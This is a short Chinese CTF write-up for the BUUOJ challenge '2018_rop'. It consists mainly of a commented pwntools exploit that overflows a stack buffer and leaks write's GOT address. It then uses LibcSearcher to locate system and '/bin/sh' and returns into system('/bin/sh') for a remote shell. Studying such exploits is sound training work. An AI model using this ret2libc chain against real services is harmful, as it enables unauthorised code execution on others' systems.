铁人三项(第五赛区)_2018_rop

exp 脚本

  先通过 ROP 调用 write 泄露 GOT 表中 write 的实际地址,根据偏移计算 system 和 /bin/sh 的地址,然后回到漏洞函数,再次 ROP 调用 system('/bin/sh')

from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'
# Solution script for a CTF pwn challenge, in two stages:
#   1. overflow the stack buffer and return into write@plt so the service
#      sends back the run-time address of write() held in its GOT entry;
#   2. use that address to identify the remote libc, then overflow again
#      and return into system() with a pointer to a "/bin/sh" string.
# Written for Python 2: print statement, str payloads joined with p32() output.
# NOTE(review): the filler overwrites everything between the buffer and the
# saved return address, which implies no stack canary is checked on this path;
# stage 1 exists only to recover the randomised libc base. Confirm the
# binary's mitigations with checksec.
io = remote('node3.buuoj.cn',28574)

# Parse the local copy of the challenge binary for its PLT/GOT addresses.
elf = ELF('./2018_rop')

write_got = elf.got['write']
write_plt = elf.plt['write']
# read_plt is looked up but not used anywhere in this script.
read_plt = elf.plt['read']

# Stage 1: filler up to the saved return address.
# presumably 0x88 bytes of buffer plus 4 bytes of saved EBP - TODO confirm
# against the disassembly.
payload = 'a' * (0x88 + 0x4)
# Overwritten return address: write@plt.
payload += p32(write_plt)
# Address write() returns to; per the write-up this is the vulnerable function.
# A hard-coded code address only works if the binary loads at a fixed base
# (presumably built without PIE - confirm).
payload += p32(0x80484c6)
# Stack arguments for write(fd, buf, count): fd 0, buf = write's GOT slot, 4 bytes.
payload += p32(0)
payload += p32(write_got)
payload += p32(4)

io.sendline(payload)
# recv() is called without a length while u32() needs exactly 4 bytes, so this
# relies on the service sending nothing but the 4 leaked bytes at this point.
write_addr = io.recv()
print hex(u32(write_addr))
# Alternative left commented out by the author: the same arithmetic against a
# local libc ELF object (no `libc` object is defined in this script).
#libcbase = u32(write_addr) - libc.symbols['write']
#system = libcbase + libc.symbols['system']
#binsh = libcbase + libc.search('/bin/sh').next()

# Identify the remote libc build from the leaked address of write();
# dump(name) then returns that symbol's offset inside the matched libc.
obj = LibcSearcher('write',u32(write_addr))
# libc load base = leaked run-time address - offset of write in that libc.
libcbase = u32(write_addr) - obj.dump('write')
system = libcbase + obj.dump('system')
# "str_bin_sh" is LibcSearcher's key for the "/bin/sh" string inside libc.
binsh = libcbase + obj.dump("str_bin_sh")

# Stage 2: same filler, then the return address (system), a placeholder
# return address for system() itself (0), and its single argument.
payload = 'a' * (0x88 + 4)
payload += p32(system)
payload += p32(0)
payload += p32(binsh)

# Short pause before the second send; presumably lets the service get back
# to its read call first - TODO confirm.
sleep(0.5)
io.sendline(payload)

# Hand the connection over to the terminal.
io.interactive()

posted @ 2020-02-29 00:09  PwnKi